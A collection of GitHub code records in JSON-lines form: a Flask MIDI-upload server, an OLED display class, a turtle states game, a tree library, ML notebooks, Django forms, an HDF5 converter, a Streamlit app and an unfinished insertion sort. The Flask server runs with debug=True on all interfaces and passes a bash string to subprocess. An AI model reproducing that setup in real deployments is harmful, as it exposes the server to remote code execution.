These are the extension that we are accepting to be uploaded\napp.config['ALLOWED_EXTENSIONS'] = set(['midi', 'mid'])\n\n# For a given file, return whether it's an allowed type or not\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']\n\n# This route will show a form to perform an AJAX request\n# jQuery is loaded to execute the request and update the\n# value of the operation\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n# Route that will process the file upload\n@app.route('/upload', methods=['POST'])\ndef upload():\n # Get the name of the uploaded file\n file = request.files['file']\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file form the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n try:\n r=RandomGenerator(\"./upload/\" +str(filename))\n r.writeMidToFile()\n except:\n return render_template('error.html')\n subprocess.Popen([\"bash\", \"-c\", bash])\n return render_template('player.html')\n else:\n return render_template('error.html')\n\t\n\n\t # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n #return redirect(url_for('uploaded_file',#filename=filename))\n\n\n# This route is expecting a parameter containing the name\n# of a file. Then it will locate that file on the upload \n# directory and show it on the browser, so if the user uploads\n# an image, that image is going to be show after the upload\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n \n@app.route('/static/')\ndef static_file(filename):\n return app.send_static_file(app.config['STATIC_FOLDER'])\n\n\nif __name__ == '__main__':\n app.run(\n host=\"0.0.0.0\",\n port=int(\"8083\"),\n debug=True\n )\n\n","repo_name":"tylfin/McHacks","sub_path":"webui/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20507275308","text":"import Adafruit_SSD1306\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nfrom bluescreen.observer import Observer\n\n\nclass OledDisplay(Observer):\n\n STEP = 16\n TEXT_OFFSET = 3\n\n AWAKE = Image.open('img/sun2.ppm').convert('1')\n ASLEEP = Image.open('img/moon.ppm').convert('1')\n\n def __init__(self, observable):\n Observer.__init__(self, observable)\n self._display = self._init_display()\n self._font = ImageFont.load_default()\n\n @staticmethod\n def _init_display():\n display = Adafruit_SSD1306.SSD1306_128_64(rst=24)\n display.begin()\n display.clear()\n display.display()\n return display\n\n def update(self, devices):\n width = self._display.width\n height = self._display.height\n image = Image.new('1', (width, height))\n\n draw = ImageDraw.Draw(image)\n\n img_x = self._display.width - 16\n for idx, device in enumerate(devices):\n y = OledDisplay.STEP * idx\n draw.text((0, y + OledDisplay.TEXT_OFFSET), '{:12s} {:2.2f}'.format(device[0], device[1]), font=self._font, fill=255)\n if device[2] is not None:\n status_image = OledDisplay.AWAKE if device[2] else OledDisplay.ASLEEP\n image.paste(status_image, (img_x, y))\n\n self._display.clear()\n self._display.image(image)\n self._display.display()\n\n","repo_name":"dr-mod/bluescreen","sub_path":"bluescreen/presentation/oled.py","file_name":"oled.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"11792670517","text":"import turtle\r\nfrom turtle import Turtle, Screen\r\nimport pandas\r\n\r\nscreen = Screen()\r\nscreen.title(\"U.S. States Game\")\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\n\r\ndef solution_turtle(solution, x, y):\r\n papa4 = Turtle()\r\n papa4.hideturtle()\r\n papa4.penup()\r\n papa4.speed(0)\r\n papa4.setposition(x, y)\r\n papa4.write(f\"{solution}\")\r\n\r\n\r\ndef coordinates(answer):\r\n if answer in state_list:\r\n correct_a = data[data.state == answer]\r\n x_cord = int(correct_a[\"x\"])\r\n y_cord = int(correct_a[\"y\"])\r\n solution_turtle(answer, x_cord, y_cord)\r\n return x_cord, y_cord\r\n else:\r\n return False\r\n\r\n\r\ndata = pandas.read_csv(\"50_states.csv\")\r\nstate_list = list(data.state)\r\ngame_is_on = True\r\ni = 0\r\ncorrect_guesses = []\r\nwhile game_is_on:\r\n\r\n answer_state = screen.textinput(title=f\"{i}/50 correct\", prompt=\"What's another state's name?\").title()\r\n if answer_state == \"Exit\":\r\n states_to_learn = [state for state in state_list if state not in correct_guesses]\r\n df = pandas.DataFrame(states_to_learn)\r\n df.to_csv(\"states_to_learn.csv\")\r\n break\r\n if coordinates(answer_state) and i != 50:\r\n coordinates(answer_state)\r\n correct_guesses.append(answer_state)\r\n i += 1\r\n if i == 50:\r\n game_is_on = False\r\n elif not coordinates(answer_state) and i != 50:\r\n answer_state = screen.textinput(title=f\"{i}/50 correct\", prompt=\"What's another state's name?\")\r\n\r\n\r\n","repo_name":"dvisionst/states_game_proj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14976024675","text":"from .traversal import TreeWalkStrategy, WalkAPI\nfrom .base import TreeNode\n\n\nclass TreeAPI(object):\n \"\"\"\n Tree implementation with in-order default walk strategy.\n \"\"\"\n\n # Default walk strategy for tree\n DEFAULT_WALK_STRATEGY = TreeWalkStrategy.DEPTH_FIRST\n\n def __init__(self):\n \"\"\"\n Initializes the root node and the traversal API.\n \"\"\"\n self.traversal_api = WalkAPI(strategy=self.DEFAULT_WALK_STRATEGY)\n\n def _add_children_to_node(self, node, children_data: list):\n \"\"\"\n Creates the tree based on the data dictionary. Tree assumes mapping of tree\n in a dictionary, and creates nodes with Depth-First strategy using recursion.\n :param node: a tree node instance\n :type node: TreeNode\n :param children_data:\n :type children_data:\n :return:\n :rtype:\n \"\"\"\n if len(children_data) > 0:\n for child_data in children_data:\n # raise exception and if node data is not valid\n try:\n TreeNode.validate_node(child_data)\n except Exception as e:\n raise e\n\n child_node = TreeNode(name=child_data[TreeNode.NAME],\n data=child_data[TreeNode.DATA])\n\n node.add_child(child_node)\n self._add_children_to_node(child_node, child_data[TreeNode.CHILDREN])\n\n def parse(self, tree_data: dict):\n \"\"\"\n Will parse tree data into the tree and return the root node.\n :param tree_data: data used to load tree.\n :type tree_data: dict\n :return:\n :rtype:\n \"\"\"\n\n # raise exception if node data is not valid\n try:\n TreeNode.validate_node(tree_data)\n except Exception as e:\n raise e\n\n root = TreeNode(name=tree_data[TreeNode.NAME], data=tree_data[TreeNode.DATA])\n self._add_children_to_node(root, tree_data[TreeNode.CHILDREN])\n return root\n\n def walk(self, root: TreeNode, strategy: str = TreeWalkStrategy.DEPTH_FIRST, callback=None, *args, **kwargs):\n \"\"\"\n Walks the tree with a strategy. Need Callback function to process node during walk.\n :param root: root node of the tree\n :type root: TreeNode\n :param strategy: strategy to use when traversing (DFS/ BFS)\n :type strategy: str\n :param callback: The callback function executed when node is visited during traversal\n :type callback: function\n :param args: arguments for callback function\n :type args:\n :param kwargs: keyword arguments for callback function\n :type kwargs:\n :return:\n :rtype:\n \"\"\"\n\n self.traversal_api = WalkAPI(strategy=strategy)\n self.traversal_api.start_traversal(root, callback, *args, **kwargs)\n\n def as_dict(self, root: TreeNode):\n \"\"\"\n Converts tree to dict given its root node.\n\n :param root: The root node of the tree.\n :type root: TreeNode\n :return:\n :rtype:\n \"\"\"\n tree_as_dict = {TreeNode.NAME: root.name, TreeNode.DATA: root.data, TreeNode.CHILDREN: []}\n self.traversal_api.traverse_dfs_tree_to_dict(root, tree_as_dict[TreeNode.CHILDREN])\n\n return tree_as_dict\n\n def has_node(self, root_node: TreeNode, node_name: str):\n \"\"\"\n Check if the node with name exist in the tree given it's root node\n :param root_node: root node of the tree\n :type root_node: TreeNode\n :param node_name: name of the node to search\n :type node_name: str\n :return: True/ False if the node is found / not-found\n :rtype: bool\n \"\"\"\n return self.traversal_api.search(root_node, node_name)\n\n def get_height(self, root_node: TreeNode):\n \"\"\"\n Get the height of the tree given the root node.\n\n :param root_node: root node of the tree\n :type root_node: TreeNode\n :return: height of the tree\n :rtype: int\n \"\"\"\n\n return self.traversal_api.traverse_get_height(root_node)\n\n\n\n\n\n\n\n\n\n","repo_name":"nitinkatyal1314/data-structures","sub_path":"pyds/tree/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"3863919818","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[4]:\n\n\ndata = \"F:/Applied Informatics/Semester-III/Data Visualization/Laboratory Works/Homework 6 and 7/Dataset/cars.csv\"\n\n\n# In[5]:\n\n\ndata\n\n\n# In[13]:\n\n\ndataf = pd.read_csv(data, names=['mpg','cylinders','cubicinches','hp','weightlbs','time-to-60','year','brand'])\n\n\n# In[14]:\n\n\ndataf.head()\n\n\n# In[64]:\n\n\nfeatures = ['mpg','cylinders','cubicinches','hp']\ncars = dataf.loc[2:30, features].values\n\n\n# In[65]:\n\n\ncars_y = dataf.loc[2:30,['brand']].values\n\n\n# In[66]:\n\n\ncarss = StandardScaler().fit_transform(cars)\n\n\n# In[87]:\n\n\npd.DataFrame(data = cars, columns = features).head(30)\n\n\n# In[68]:\n\n\npca = PCA(n_components = 2)\n\n\n# In[69]:\n\n\nprincipalComponents = pca.fit_transform(cars)\n\n\n# In[70]:\n\n\nprincipalDf = pd.DataFrame(data = principalComponents, columns = ['PrincipalComponent_1','PrincipalComponent_2'])\n\n\n# In[85]:\n\n\nprincipalDf.head(30)\n\n\n# In[86]:\n\n\ndataf[['brand']].head(30)\n\n\n# In[74]:\n\n\nfinalDf = pd.concat([principalDf, dataf[['brand']]], axis = 1)\n\n\n# In[88]:\n\n\nfinalDf.head(30)\n\n\n# In[97]:\n\n\nfig = plt.figure(figsize = (15,15))\nax = fig.add_subplot(1,1,1) \nax.set_xlabel('Principal Component 1', fontsize = 15)\nax.set_ylabel('Principal Component 2', fontsize = 15)\nax.set_title('PCA for Car Dataset', fontsize = 20)\n\n\ntargets = ['Europe', 'US.','Japan']\ncolors = ['r', 'g', 'b']\nfor brand, color in zip(targets,colors):\n indicesToKeep = finalDf['brand'] == brand\n ax.scatter(finalDf.loc[indicesToKeep, 'PrincipalComponent_1']\n , finalDf.loc[indicesToKeep, 'PrincipalComponent_2']\n , c = color\n , s = 50)\nax.legend(targets)\nax.grid()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ravinthiranpartheepan1407/Data-Science-Projects","sub_path":"Data Visualization/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73314191492","text":"\n# coding: utf-8\n\n# # Assignment 5\n# # Neural Network\n# submitted by
\n# roll no : 2018201051\n# \n\n# ## Question 1 : Creating Neural Network \n\n# In[ ]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# In[6]:\n\n# from google.colab import files\n# uploaded = files.upload()\n\n# from google.colab import files\n# uploaded = files.upload()\n\nget_ipython().system(u'unzip data.zip')\n\n\n# In[ ]:\n\ndef sigmoid(Z):\n temp = 1 + np.exp(-Z)\n return 1./temp\n\n\n# In[ ]:\n\ndef relu(Z):\n temp = np.where(Z >= 0 , 1 , 0)\n return Z*temp\n\n\n# In[ ]:\n\ndef softmax(Z):\n temp = np.exp(Z)\n temp1 = np.sum(temp , axis = 0)\n return np.divide(temp , temp1 , dtype = \"float\")\n\n\n# In[ ]:\n\ndef y_transform(y):\n arr = []\n for i in range(y.shape[0]):\n temp = [0,0,0,0,0,0,0,0,0,0]\n val = y.iloc[i]\n temp[val] = 1 \n arr.append(temp)\n arr = np.array(arr)\n return arr.T\n\n\n# In[ ]:\n\ndef linear_backward( dZ , A_prev , W):\n m = A_prev.shape[1]\n dW = np.dot(dZ, A_prev.T)/m\n db = np.sum(dZ, axis = 1, keepdims = True)/m\n dA_prev = np.dot(W.T, dZ)\n return dA_prev , db , dW\n\ndef relu_backward( dA , Z):\n temp = np.where(Z >= 0 , 1 ,0)\n return dA*temp\n\ndef sig_backward( dA , Z):\n temp = sigmoid(Z)*(1-sigmoid(Z))\n return dA*temp\n \ndef tanh_backward( dA , Z):\n temp = 1.0 - np.tanh(Z)**2\n return dA*temp\n\n\n# In[ ]:\n\nclass neuralNet():\n def __init__(self, dims = [] , fun = [] ,iterations = 30, learning_rate = 0.1):# dims = [input_dims, h1layer , .... , out_layer] , fun = activation function at each layer\n self.num_iters = iterations\n self.num_layers = len(dims)-1\n self.parameters = {}\n self.learning_rate = learning_rate\n self.training_error = []\n self.val_error = []\n \n for i in range(1, self.num_layers +1):\n self.parameters[\"W\" + str(i)] = np.random.randn(dims[i],dims[i-1])\n self.parameters[\"b\" + str(i)] = np.zeros((dims[i] , 1))\n self.parameters[\"activation\" + str(i)] = fun[i-1]\n \n def train_forward(self,X) :\n caches = []\n A_old = X\n for i in range(1, self.num_layers + 1) :\n\n temp = np.matmul(self.parameters[\"W\" + str(i)], A_old) \n Z = temp + self.parameters[\"b\" + str(i)]\n \n if np.isnan(np.sum(Z)) :\n print(\"Error at Layer : \" + str(i))\n print(Z)\n\n if self.parameters[\"activation\" + str(i)] == \"relu\" :\n A_new = relu(Z)\n \n elif self.parameters[\"activation\" + str(i)] == \"tanh\" :\n A_new = np.tanh(Z)\n\n\n elif self.parameters[\"activation\" + str(i)] == \"sigmoid\":\n A_new = sigmoid(Z)\n\n elif self.parameters[\"activation\" + str(i)] == \"softmax\":\n A_new = softmax(Z)\n \n cache = (A_old, Z)\n caches.append(cache)\n A_old = A_new\n return A_new , caches\n \n \n \n def train_backward(self , Al , y , caches):\n grads = {}\n L = self.num_layers\n A_prev , Z = caches[ L - 1 ]\n dZl = Al - y # for softmax layer only\n dA_prev , db , dW = linear_backward( dZl , A_prev ,self.parameters[\"W\" + str(L)])\n# grads[\"dA\" + str(L-1)] = dA_prev\n grads[\"dW\" + str(L)] = dW\n grads[\"db\" + str(L)] = db\n for i in range(L-1,0,-1) :\n A_prev , Z = caches[i-1]\n if self.parameters[\"activation\" + str(i)] == \"relu\":\n dZ = relu_backward(dA_prev , Z)\n elif self.parameters[\"activation\" + str(i)] == \"sigmoid\":\n dZ = sig_backward(dA_prev, Z)\n elif self.parameters[\"activation\" + str(i)] == \"tanh\":\n dZ = tanh_backward(dA_prev, Z)\n dA_prev, db , dW = linear_backward(dZ ,A_prev , self.parameters[\"W\" + str(i)])\n\n grads[\"dW\" + str(i)] = dW\n grads[\"db\" + str(i)] = db\n return grads \n \n \n def update_weights(self, grads):\n for l in range(self.num_layers):\n\n self.parameters[\"W\" + str(l+1)] += -self.learning_rate*grads[\"dW\" + str(l+1)]\n self.parameters[\"b\" + str(l+1)] += -self.learning_rate*grads[\"db\" + str(l+1)]\n\n def fit(self , X, Y ,val_X , val_Y, batch_size = 5000):\n l = X.shape[0]/batch_size\n \n val_X = val_X.astype('float')/255\n val_Y = y_transform(val_Y)\n \n for i in range(self.num_iters):\n print(\"Epoch ========== \" + str(i)+\" :=========== \")\n cost = 0\n for j in range(l):\n x_batch = X.iloc[j*batch_size : (j+1)*batch_size , :].astype('float')\n y_batch = Y.iloc[j*batch_size : (j+1)*batch_size ]\n x_batch = x_batch/255\n\n Al , caches = self.train_forward(x_batch.T)\n y_batch = y_transform(y_batch)\n cost += self.error(Al , y_batch) # y-batch should be ( nl * m )\n grads = self.train_backward(Al ,y_batch , caches)\n self.update_weights(grads)\n \n self.training_error.append(float(cost)/X.shape[0])\n \n #Calculating validation error\n al_val, _ = self.train_forward(val_X.T)\n val_e = float(self.error(al_val,val_Y))/val_X.shape[0]\n self.val_error.append(val_e)\n print(\"training error is \" + str(float(cost)/X.shape[0]))\n print(\"val error is : \" + str(val_e))\n \n def error(self, al , y ):\n n_max = np.max(al ,axis = 0 )\n result = np.where(al >=n_max , 1 , 0)\n cost = np.sum(np.sum(np.abs(result-y) , axis = 0)/2)\n return float(cost)\n \n def epoch_vs_accuracy(self):\n plt.plot( range(self.num_iters), self.training_error , 'r')\n plt.plot(range(self.num_iters) , self.val_error , 'g')\n plt.xlabel(\"numbers of Epochs\")\n plt.ylabel(\"error\")\n plt.legend([\"training error\" , \"validation error\"])\n plt.show()\n \n \n def predict(self , X):\n X = X.astype('float')/255\n# y = y_transform(y)\n al, caches = self.train_forward(X.T)\n n_max = np.max(al ,axis = 0)\n result = np.where(al >=n_max , 1 , 0)\n temp = np.array([0,1,2,3,4,5,6,7,8,9]).reshape(10,1)\n n_max2 = np.max(result*temp,axis = 0)\n return n_max2\n \n# \n\n\n# ## Loading Apparel dataset\n\n# In[ ]:\n\ndata = pd.read_csv('data.csv')\ndata.head()\ntrain_data = data.iloc[:50000,:]\nval_data = data.iloc[50000:,:]\n\n\n# In[ ]:\n\ntrain_X = train_data.iloc[: , 1:]\ntrain_Y = train_data.iloc[: , 0]\nval_X = val_data.iloc[:,1:]\nval_Y = val_data.iloc[:,0]\n\n\n# ## Some examples \n\n# ### Training a neural network with 2 hidden layers and sigmoid function \n\n# In[ ]:\n\nNN = neuralNet([784 ,300, 100 , 10] ,['sigmoid', 'sigmoid' , 'softmax'] , iterations = 50)\n\n\n# In[16]:\n\nNN.fit(train_X ,train_Y ,val_X , val_Y , 500)\n\n\n# ### Predicting on test data\n\n# In[ ]:\n\ntest_data = pd.read_csv(\"apparel-test (1).csv\")\n\n\n# In[25]:\n\ntest_result = NN.predict(test_data)\nprint(test_result)\nnp.savetxt(\"foo.csv\", test_result , fmt = \"%d\")\n\nfiles.download('foo.csv')\n\n\n# In[19]:\n\nNN.epoch_vs_accuracy()\n\n\n# ### Training with relu function \n\n# In[ ]:\n\nNN1 = neuralNet([784 ,64, 10] ,['relu' , 'softmax'] , iterations = 50, learning_rate = 0.005)\n\n\n# In[23]:\n\nNN1.fit(train_X , train_Y,val_X , val_Y , 100)\n\n\n# In[24]:\n\nNN1.epoch_vs_accuracy()\n\n\n# ### Training with Tanh function( 2 hidden layers )\n\n# In[ ]:\n\nNN2 = neuralNet([784 ,256 , 256, 10] ,['tanh' ,'tanh' , 'softmax'] , iterations = 50, learning_rate = 0.1)\n\n\n# In[27]:\n\nNN2.fit(train_X , train_Y , val_X ,val_Y , 100)\n\n\n# In[28]:\n\nNN2.epoch_vs_accuracy()\n\n\n# ### Training with Sigmoid \n\n# In[ ]:\n\nNN3 = neuralNet([784 ,1024, 10] ,['sigmoid' , 'softmax'] , iterations = 50 , learning_rate = 0.1)\n\n\n# In[30]:\n\nNN3.fit(train_X, train_Y , val_X , val_Y , 100)\n\n\n# In[32]:\n\nNN3.epoch_vs_accuracy()\n\n\n# ## Accuracy variation with no of layers : \n\n# In[34]:\n\nlayers = [1,2,3]\nerror_rates = []\n\n# 1 hidden layer\nNN4 = neuralNet([784 ,256, 10] ,['sigmoid' , 'softmax'] , iterations = 20 , learning_rate = 0.1)\nNN4.fit(train_X,train_Y , val_X , val_Y , 500)\nerror_rates.append(NN4.val_error[-1])\n\n# 2 hidden layer\nNN5 = neuralNet([784 ,256,256, 10] ,['sigmoid', 'sigmoid' , 'softmax'] , iterations = 20 , learning_rate = 0.1)\nNN5.fit(train_X , train_Y , val_X , val_Y , 500)\nerror_rates.append(NN5.val_error[-1])\n\n#3 hidden layers\n\nNN6 = neuralNet([784 ,256,256,256, 10] ,['sigmoid','sigmoid','sigmoid','softmax'] , iterations = 20 , learning_rate = 0.1)\nNN6.fit(train_X , train_Y , val_X , val_Y , 500)\nerror_rates.append(NN6.val_error[-1])\n\n\nplt.plot(layers , error_rates , 'g')\nplt.show()\n\n\n# In[37]:\n\nNN4.epoch_vs_accuracy()\nNN5.epoch_vs_accuracy()\nNN6.epoch_vs_accuracy()\nplt.plot(layers , error_rates , 'g')\nplt.xlabel(\"No of layers\")\nplt.ylabel(\"Error\")\nplt.show()\n\n\n# ## Question 2 : \n\n# ### Requirments for the data set of house price prediction : \n\n# ```\n# 1 . only one node will be enough in the output layer since it is a regression problem .\n# 2 . Required linear activation function in the output layer(need to modifiy as softmax is used in above \n# neural network) .\n# 3 . All hidden layers should not have linear activation function since it will be unable to learn \n# nonlinearity in the data because 3 hidden layers with all linear activation will work the same way \n# as a single layer neural network. \n# 4 . cost function should also be changed.(ex : least mean square can be used. )\n# ```\n","repo_name":"agarwal29796/neural-network","sub_path":"src/2018201051.py","file_name":"2018201051.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73710576131","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom .models import User\n\n\nclass CreateUserForm(UserCreationForm):\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n\nclass EditProfileForm(forms.ModelForm):\n profile = forms.ImageField(\n required=False,\n error_messages={\"invald\": (\"Image files only.\")},\n widget=forms.FileInput,\n )\n\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"bio\", \"profile\")\n\n\nclass SearchForm(forms.Form):\n username = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by username\"}),\n )\n\n class Meta:\n model = User\n fields = (\"username\",)\n","repo_name":"jee3153/instagram-clone","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27917939992","text":"#!/usr/bin/env python\n# make_h5.py\n#\nimport argparse\nimport h5py\nimport io\nimport numpy\nimport os\nimport torchvision.transforms\nimport tqdm\nfrom PIL import Image\n\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport datasets.padchestdataset\nPADCHEST_CORRUPTED = set(datasets.padchestdataset.CORRUPTED)\n\ndef is_image(path):\n lower = path.lower()\n if lower.startswith('.') or lower.endswith('fake.jpg'):\n return False\n if lower.endswith('.jpg') or lower.endswith('png'):\n return True\n else:\n return False\n\ndef find_images(parentpath):\n '''\n Find images in ``parentpath`` and all subdirectories. Return list of paths \n (strings).\n '''\n paths = []\n for triple in os.walk(parentpath, followlinks=True):\n for path in triple[-1]:\n if is_image(path):\n paths.append(os.path.join(triple[0], path))\n # remove path prefix\n for ipath, path in enumerate(paths):\n paths[ipath] = path[len(parentpath):]\n return paths\n\ndef save_png_bytes(h5handle, path, image):\n image_byte_array = io.BytesIO()\n image.save(image_byte_array, format='PNG')\n image_bytes = image_byte_array.getvalue()\n # magic\n image_raw_np = numpy.asarray(image_bytes)\n h5handle['images'].create_dataset(path, data=image_raw_np)\n\ndef convert_dataset():\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Scale(224),\n torchvision.transforms.CenterCrop(224)\n ])\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", dest='imagedir')\n parser.add_argument(\"-o\", dest='outpath')\n args = parser.parse_args()\n\n h5handle = h5py.File(args.outpath, 'w', libver='latest')\n h5handle.swmr_mode = True\n\n h5handle.create_group(\"images\")\n\n # directory structure is
/\n print(\"\\n\")\n img_paths = find_images(args.imagedir)\n for ip in tqdm.tqdm(img_paths):\n if not os.path.basename(ip) in PADCHEST_CORRUPTED:\n path = os.path.join(os.path.abspath(args.imagedir), ip.strip('/')) \n image = Image.open(path)\n # downsample\n image = transform(image)\n save_png_bytes(h5handle, ip, image)\n\nif __name__ == \"__main__\":\n convert_dataset()\n","repo_name":"suinleelab/cxr_covid","sub_path":"data/make_h5.py","file_name":"make_h5.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"44"} +{"seq_id":"39725380264","text":"from turtle import onclick\nimport pandas as pd\nimport numpy as np\nfrom sklearn import tree\nimport streamlit as st\n\ndtype = {\n 'INST': int,\n 'CORE': int,\n 'RAM': int,\n 'Time-q64-v2.4': np.float64,\n 'Time-q70-v2.4': np.float64,\n 'Time-q82-v2.4': np.float64,\n 'Time-Avg': np.float64,\n 'Cost-q64-v2.4': np.float64,\n 'Cost-q70-v2.4': np.float64,\n 'Cost-q82-v2.4': np.float64,\n 'Cost-Avg': np.float64\n}\n\n# Read original CSV\ndf = pd.read_csv(\"F:\\\\Stuff\\\\Thesis\\\\Results.csv\", delimiter=';', decimal=',', dtype=dtype)\n# One hot representation for types of queries\ndf2 = pd.melt(df, id_vars=['INST', 'CORE', 'RAM'], value_vars=['Time-q64-v2.4', 'Time-q70-v2.4', 'Time-q82-v2.4', 'Time-Avg'], var_name='type', value_name='time')\ndf2 = pd.concat([df2, pd.get_dummies(df2['type'])], axis=1)\ndf2 = df2[df2.columns[~df2.columns.isin(['type'])]]\n# Values for cost per time unit\nvCPUsec = 1.461777E-5\nGBsec = 0.160513888888E-5\n# Reintroduce cost column\ndf2['cost'] = df2['time'] * (df2['INST'] * df2['CORE'] * vCPUsec + df2['RAM'] * GBsec)\n# Copy dataframe in order to iteratively change column values later\nfdf = df2.copy()\n\nst.write('Configuration')\n# Pick query or Avg\nquery = st.selectbox('Load Type', ['Balanced', 'Network Shuffle Heavy', 'CPU Heavy', 'I/O Heavy'])\nif query == 'Balanced':\n query = 'Avg'\nelif query == 'Network Shuffle Heavy':\n query = 'q64-v2.4'\nelif query == 'CPU Heavy':\n query = 'q70-v2.4'\nelse:\n query = 'q82-v2.4'\n\n# Scale = 10 for default dataset otherwise change to 100, 1000 and so on to get linear approximation\nscale = st.select_slider('Dataset Size', options=[10, 100, 1000, 10000], format_func=str)\n\nfdf['cost'] = df2['cost']*scale/10\nfdf['time'] = df2['time']*scale/10\n\n# Split to X and y\nX = fdf.loc[fdf[f'Time-{query}'] == 1]\ny = fdf.loc[fdf[f'Time-{query}'] == 1][fdf.columns[:3]]\n\n# Declare three decision trees\nregr = tree.DecisionTreeRegressor()\nregr2 = tree.DecisionTreeRegressor()\nregr3 = tree.DecisionTreeRegressor()\n\n# Fit the trees to the data\ntime_to_settings = regr.fit(X['time'].array.reshape(-1,1), y)\nmoney_to_settings = regr2.fit(X['cost'].array.reshape(-1,1), y)\nsettings_to_time = regr3.fit(y, X['time'].array.reshape(-1,1))\n\n########################################################\ndef find_config():\n global rinput, x\n if rinput == 'Runtime (seconds)':\n i, c, r = time_to_settings.predict([[x]])[0]\n else:\n i, c, r = money_to_settings.predict([[x]])[0]\n return(f'Instances: {int(i)} Cores: {int(c)} RAM: {int(r)}')\n\nst.write('Find Configuration')\n\nrinput = st.radio('Input', ['Runtime (seconds)', 'Cost'])\n\nx = st.number_input('Constraint Value')\nst.write('Valid Configuration')\nst.write(find_config())\n########################################################\ndef find_time_cost():\n global w, cor, ra\n time = settings_to_time.predict([[w, cor, ra]])[0]\n return(f'Approximated Time: {time:.2f}s, Calculated Cost: {time*(w*cor*vCPUsec+ra*GBsec)}')\nst.write('')\nst.write('Calculate Time & Cost from Configuration')\n\nw = st.select_slider('Workers', [1, 2, 3, 4])\ncor = st.select_slider('Cores (per worker)', [1, 2, 3])\nra = st.select_slider('RAM (per worker)', [1, 2, 3])\n\nst.button('Calculate', on_click=find_time_cost)\nst.write(find_time_cost())","repo_name":"AriSpyrou/DSS-for-Spark-on-Kubeflow","sub_path":"python/decision_tree_bonanza.py","file_name":"decision_tree_bonanza.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7980577280","text":"import tkinter as tk\nimport os\nfrom PIL import Image\n\nroot = tk.Tk()\nscrollbar = tk.Scrollbar(root)\nscrollbar.pack( side = tk.RIGHT, fill=tk.Y )\nmylist = tk.Listbox(root, font = \"verdana 15\", yscrollcommand = scrollbar.set, height= 5, width = 10 )\n\npathToImages = ['/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg',\n'/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg','/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg',\n'/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg']\n\ndef buttonHandler(self):\n bi = Image.open(pathToImages[int(mylist.curselection()[0])])\n bi.show()\n\na = mylist.insert(tk.END,str('Biscuit'))\nb = mylist.insert(tk.END,str('Chocolate'))\nc = mylist.insert(tk.END,str('Sandwich'))\nd = mylist.insert(tk.END,str('Cake'))\n\nmylist.bind('<>', buttonHandler)\n\n\nmylist.pack( )\nscrollbar.config( command = mylist.yview )\ntk.mainloop()\n","repo_name":"jinhopark8345/ICC","sub_path":"icc/gui/temp_list_with_image.py","file_name":"temp_list_with_image.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74673007814","text":"# 1. Create an unsorted array\nmyNums = [20, 83, 99, 28, 37, 45, 74, 16, 9, 35]\n# 2. Create a function named insertion_sort\ndef insertion_sort():\n# 3. Create a for loop that will iterate the array with respect to its length\n for i in range(1, len(myNums)):\n element = myNums[i] #i = 1\n j = i-1 # 0\n# 4. Create a while loop that will compare a consecutive pair in the array\n while j >= 0 and element < myNums[j]: # greater than index 0\n myNums[j+1] = myNums [j]\n j -= 1\n myNums[j+1] = element\n# 5. return the array\n return myNums\n# 6. call the 